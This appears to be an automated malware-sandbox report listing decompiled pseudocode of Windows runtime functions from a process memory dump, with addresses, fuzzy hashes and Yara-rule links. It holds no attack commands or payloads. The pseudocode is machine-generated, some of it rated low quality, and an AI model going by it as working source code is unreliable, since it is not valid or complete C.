                        0x02b76d6d
                        0x02b76d6f
                        0x02b76d6f
                        0x02b76d74
                        0x02b76d79
                        0x02b76d7a
                        0x02b76d7f
                        0x02b76d82
                        0x02b76d88
                        0x02b76d89
                        0x02b76d90
                        0x02b76d94
                        0x02b76da7
                        0x02b76db1
                        0x02b76db1
                        0x02b76dbb
                        0x02b76dbb
                        0x02b76d90
                        0x02b76d69
                        0x02b76d46
                        0x02b76dc6

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e46cae05a39e809a0cb1e84bb1f781e5c63d69c6c234f42b0d9bf44538ad5cf4
                        • Instruction ID: 27b07e1eb900cb5e2ebe5e9d3104db0c50bf921f2d35940ce98eef7a19567755
                        • Opcode Fuzzy Hash: e46cae05a39e809a0cb1e84bb1f781e5c63d69c6c234f42b0d9bf44538ad5cf4
                        • Instruction Fuzzy Hash: FF21D072510B449FC311DF6AC944BABB7EDEF81744F080496FD6087290EB34C909CAA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC070D, Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E02BC070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E02BC07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E02BBAFDE( &_v8,  &_v12);
					E02BC1293(_t38, _v28, _t60);
					if(E02B17D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E02BB14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                        0x02bc071b
                        0x02bc0724
                        0x02bc0734
                        0x02bc0738
                        0x02bc074b
                        0x02bc074b
                        0x02bc0753
                        0x02bc0753
                        0x02bc0759
                        0x02bc075d
                        0x02bc0774
                        0x02bc0779
                        0x02bc077d
                        0x02bc0789
                        0x02bc0795
                        0x02bc07a7
                        0x02bc0797
                        0x02bc07a0
                        0x02bc07a0
                        0x02bc07af
                        0x02bc07c4
                        0x02bc07cd
                        0x02bc07cd
                        0x02bc07af
                        0x02bc07dc

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: a5bbfafcea3cae5d24bcdabd71aafce7f4b25354bf9f2b339c557d4882f017fb
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: 5C2107363042049FD705DF18C884BAABBA6EFC4750F1485ADF9959B385DB30D909CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1AE73, Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E02B1AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E02B17D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E02B17D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E02B17D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E02B17D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E02B77794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                        0x02b1ae78
                        0x02b1ae7c
                        0x02b1ae7e
                        0x02b1ae81
                        0x02b1ae86
                        0x02b1ae8d
                        0x02b62691
                        0x02b1ae93
                        0x02b1ae93
                        0x02b1ae93
                        0x02b1ae98
                        0x02b1ae9d
                        0x02b626a2
                        0x02b626b4
                        0x02b626a4
                        0x02b626ad
                        0x02b626ad
                        0x02b626b9
                        0x00000000
                        0x02b626bb
                        0x00000000
                        0x02b626bb
                        0x02b1aea3
                        0x02b1aea3
                        0x02b1aea3
                        0x02b1aeaa
                        0x02b626c0
                        0x02b626c9
                        0x02b626c9
                        0x02b1aeb3
                        0x02b626d4
                        0x02b626e1
                        0x00000000
                        0x00000000
                        0x02b626e7
                        0x02b626ee
                        0x02b626f0
                        0x02b626f9
                        0x02b626f9
                        0x02b62702
                        0x02b62708
                        0x02b62708
                        0x02b6270b
                        0x02b6270f
                        0x02b62711
                        0x02b62711
                        0x02b62725
                        0x02b62725
                        0x00000000
                        0x02b1aeb9
                        0x02b1aeb9
                        0x02b1aebf
                        0x02b1aebf
                        0x02b1aeb3

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: facb7e836c08d79f3bd1cc48e427ac969dfcaeab355e6ec5ecada3a580a48087
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: 67210572602685DFE726DB68C948B3577E9EF45354F1900E0DD048B7A2EB78EC40CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B77794, Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E02B77794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x2be7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E02B3F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E02B17D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E02B39AE0();
					_t24 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                        0x02b77799
                        0x02b7779a
                        0x02b7779b
                        0x02b777a3
                        0x02b777ab
                        0x02b777ae
                        0x02b777b1
                        0x02b777b1
                        0x02b777bf
                        0x02b777c4
                        0x02b777c8
                        0x02b777ce
                        0x02b777d4
                        0x02b777e0
                        0x02b777e0
                        0x02b777d6
                        0x02b777d6
                        0x02b777de
                        0x00000000
                        0x00000000
                        0x02b777de
                        0x02b777e5
                        0x02b777f0
                        0x02b777f3
                        0x02b777f6
                        0x02b777fd
                        0x02b77800
                        0x02b7780c
                        0x02b77818
                        0x02b7782b
                        0x02b7781a
                        0x02b77823
                        0x02b77823
                        0x02b77830
                        0x02b77831
                        0x02b77838
                        0x02b7783d
                        0x02b7783e
                        0x02b7784f
                        0x02b7784f
                        0x02b7785a

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f55c84d1046ae4769a8a61ece46fbf65c40693d6ccb87a4fe6bc68b58a628900
                        • Instruction ID: 8d68f921577045b632993cafe86529df359080a6dafc50c032d97bbabee6cdef
                        • Opcode Fuzzy Hash: f55c84d1046ae4769a8a61ece46fbf65c40693d6ccb87a4fe6bc68b58a628900
                        • Instruction Fuzzy Hash: 78218E72900604AFC725DF69D890EABB7B9EF48740F1045ADF51AD7750EB34E900DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2FD9B, Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E02B2FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E02B076E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                        0x02b2fd9b
                        0x02b2fda0
                        0x02b2fda1
                        0x02b2fdab
                        0x02b2fdad
                        0x02b2fdb0
                        0x02b2fdb8
                        0x02b2fe0f
                        0x02b2fde6
                        0x02b2fde9
                        0x02b2fdec
                        0x02b6c0c0
                        0x02b2fdfe
                        0x02b2fe06
                        0x02b2fe06
                        0x02b6c0c8
                        0x02b2fe2d
                        0x02b2fe2d
                        0x00000000
                        0x02b2fe2d
                        0x02b6c0d1
                        0x02b6c0e0
                        0x02b6c0e5
                        0x02b6c0e5
                        0x02b6c0e8
                        0x00000000
                        0x02b6c0e8
                        0x02b2fdf4
                        0x00000000
                        0x00000000
                        0x02b2fdf6
                        0x02b2fdfa
                        0x02b2fe1a
                        0x02b2fe1f
                        0x02b2fe1f
                        0x02b2fdfc
                        0x00000000
                        0x02b2fdfc
                        0x02b2fdcc
                        0x02b2fdd0
                        0x02b2fe26
                        0x00000000
                        0x02b2fe26
                        0x02b2fdd8
                        0x02b2fddb
                        0x02b2fddd
                        0x02b2fde0
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: df78616d17afecfd936759f2ad5d9ee4c633506e5c6d456226bc8f6f9b7f2fc9
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: F3215772600B50DBC7328F49C540A76F7B6EB98B50F2485AEE94E87A11D730AC04DB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF9240, Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E02AF9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x2bcf708);
				E02B4D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E02B395D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E02B395D0();
				_t33 =  *0x2be84c4; // 0x0
				L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x2be84c4; // 0x0
				L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x2be84c4; // 0x0
				E02B12280(L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2be86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E02B395D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E02B395D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E02AF9325();
					_t50 =  *0x2be84c4; // 0x0
					return E02B4D0D1(L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                        0x02af9240
                        0x02af9242
                        0x02af9247
                        0x02af924c
                        0x02af924e
                        0x02af9255
                        0x02af9257
                        0x02af925a
                        0x02af925f
                        0x02af925f
                        0x02af9266
                        0x02af9271
                        0x02af9276
                        0x02af9279
                        0x02af927e
                        0x02af9295
                        0x02af929a
                        0x02af92b1
                        0x02af92b6
                        0x02af92d7
                        0x02af92dc
                        0x02af92e0
                        0x02af92e6
                        0x02af92e8
                        0x02af92ee
                        0x02af9332
                        0x02af9333
                        0x02af9337
                        0x02af9338
                        0x02af933a
                        0x02af933a
                        0x02af933d
                        0x02af9342
                        0x02af9342
                        0x02af9345
                        0x02af9349
                        0x02af934e
                        0x02af9352
                        0x02af9357
                        0x02af92f4
                        0x02af92f4
                        0x02af92f6
                        0x02af92f9
                        0x02af9300
                        0x02af9306
                        0x02af9324
                        0x02af9324

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 0654ed6081fe247cac6c0fee98300aaf8f854cddd19005bbcd122802cedba6ae
                        • Instruction ID: e0dc04a0c15ad5631e8125d5df49f5ceb98b83ff9fc938333621294105302de6
                        • Opcode Fuzzy Hash: 0654ed6081fe247cac6c0fee98300aaf8f854cddd19005bbcd122802cedba6ae
                        • Instruction Fuzzy Hash: 77212A72581A01DFC762EF68CA40F1AB7BAFF08704F1545ACA14A876B1CB39E951DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2B390, Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E02B2B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E02B12280(_t12, 0x2be8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E02B300C2(0x2be8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                        0x02b2b395
                        0x02b2b3a2
                        0x02b2b3a5
                        0x02b2b3aa
                        0x02b2b3b2
                        0x02b2b3ba
                        0x02b2b3bd
                        0x02b2b3c0
                        0x02b2b3c4
                        0x02b2b3c9
                        0x02b6a3e9
                        0x02b6a3ed
                        0x02b6a3f0
                        0x02b6a3ff
                        0x02b6a403
                        0x02b6a409
                        0x00000000
                        0x00000000
                        0x02b6a40b
                        0x02b6a40b
                        0x02b6a40f
                        0x02b6a415
                        0x02b6a423
                        0x02b6a423
                        0x02b6a415
                        0x02b2b3d1
                        0x02b2b3e8
                        0x02b2b3e8
                        0x02b2b3d9

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c6422308709a21e9b16a6ac271ef8abe35c53c4bfddf7adfb1612617fd8df80
                        • Instruction ID: 31b3d98d7b0ee5fa257b5396ada9f3b8a991e3de2b0b13ca08bfcb688863bc83
                        • Opcode Fuzzy Hash: 4c6422308709a21e9b16a6ac271ef8abe35c53c4bfddf7adfb1612617fd8df80
                        • Instruction Fuzzy Hash: 321148333012209FCF299A148E81B2B7357EBC5330B2881A9DD1BE7390CE359C06C6D4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B84257, Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E02B84257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x2bd08d0);
				E02B4D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E02B841E8(__ebx, __edi, __ecx, _t39);
				E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x2be87e4;
					_t18 =  *0x2be87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x2be5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x2be87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x2be87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L02AF7055(_t31 + 0xfffffff8);
								_t24 =  *0x2be87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x2be87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x2be5cd0;
				if( *0x2be5cd0 <= 0) {
					L02AF7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x2be87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x2be87e8 = _t30;
						 *0x2be87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E02B4D0D1(L02B84320());
			}















                        0x02b84257
                        0x02b84257
                        0x02b84257
                        0x02b84259
                        0x02b8425e
                        0x02b84263
                        0x02b84265
                        0x02b84273
                        0x02b84278
                        0x02b8427c
                        0x02b8427f
                        0x02b84281
                        0x02b84287
                        0x02b842d7
                        0x02b842d7
                        0x02b842da
                        0x02b8428d
                        0x02b8428d
                        0x02b8428f
                        0x02b84292
                        0x02b84297
                        0x02b8429c
                        0x02b842a0
                        0x02b842a6
                        0x02b842a8
                        0x02b842ae
                        0x02b842b3
                        0x00000000
                        0x02b842ba
                        0x02b842ba
                        0x02b842bf
                        0x02b842c5
                        0x02b842ca
                        0x02b842cf
                        0x02b842d0
                        0x00000000
                        0x02b842d0
                        0x02b842b3
                        0x00000000
                        0x02b842a6
                        0x02b8429c
                        0x02b842dc
                        0x02b842dc
                        0x02b842e3
                        0x02b84309
                        0x02b842e5
                        0x02b842e5
                        0x02b842e8
                        0x02b842ee
                        0x02b842f0
                        0x00000000
                        0x02b842f2
                        0x02b842f2
                        0x02b842f4
                        0x02b842f7
                        0x02b842f9
                        0x02b84300
                        0x02b84300
                        0x02b842f0
                        0x02b8430e
                        0x02b8431f

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3672afe96eae1594ba1e875c223af3f74c3b48c179fbe4f5a32e440c186fe77e
                        • Instruction ID: f6b75a1cc170639a80c37de392420e756db6ef4e9e9bd58dfd08fa7076af26e5
                        • Opcode Fuzzy Hash: 3672afe96eae1594ba1e875c223af3f74c3b48c179fbe4f5a32e440c186fe77e
                        • Instruction Fuzzy Hash: FD216A70990A06CFCB25EF64D140B14BBF2FB85394B508AEED1498F2A0EB35D491CF02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B22397, Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        C-Code - Quality: 25%
                        			E02B22397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x2be848c != 0) {
					L02B1FAD0(0x2be8610);
					if( *0x2be848c == 0) {
						E02B1FA00(0x2be8610, _t19, _t27, 0x2be8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E02B22581(0x2be8610, 0x2ad50a0, _t26, _t27, _t28);
						E02B1FA00(0x2be8610, 0x2ad50a0, _t27, 0x2be8610);
					}
				} else {
					L1:
					_t11 =  *0x2be8614; // 0x0
					if(_t11 == 0) {
						_t11 = E02B34886(0x2ad1088, 1, 0x2be8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E02B22581(0x2be8610, (_t11 << 4) + 0x2ad5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                        0x02b223b0
                        0x02b223b6
                        0x02b22409
                        0x02b22415
                        0x02b65ae9
                        0x00000000
                        0x02b2241b
                        0x02b2241b
                        0x02b2241d
                        0x02b22427
                        0x02b2242e
                        0x02b22430
                        0x02b22430
                        0x02b223b8
                        0x02b223b8
                        0x02b223b8
                        0x02b223bf
                        0x02b223fc
                        0x02b223fc
                        0x02b223c1
                        0x02b223c3
                        0x02b223d0
                        0x02b223d8
                        0x02b223d8
                        0x02b223dc
                        0x02b223de
                        0x02b223e1
                        0x02b223e1
                        0x02b223ec

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: affda517443fb58306b36e3a2e792b8ebc94f50b7d5cd60a2c824a8735e076e4
                        • Instruction ID: 2a041ff880f7f57b6fcf4b961c8d1253b7359cb14cf6e708d25a9b6682ec4b9a
                        • Opcode Fuzzy Hash: affda517443fb58306b36e3a2e792b8ebc94f50b7d5cd60a2c824a8735e076e4
                        • Instruction Fuzzy Hash: 2D114872640710AFD720AA29AD40B26B399EF50750F488496FA0EDB2A0CA74E849CB54
                        Uniqueness

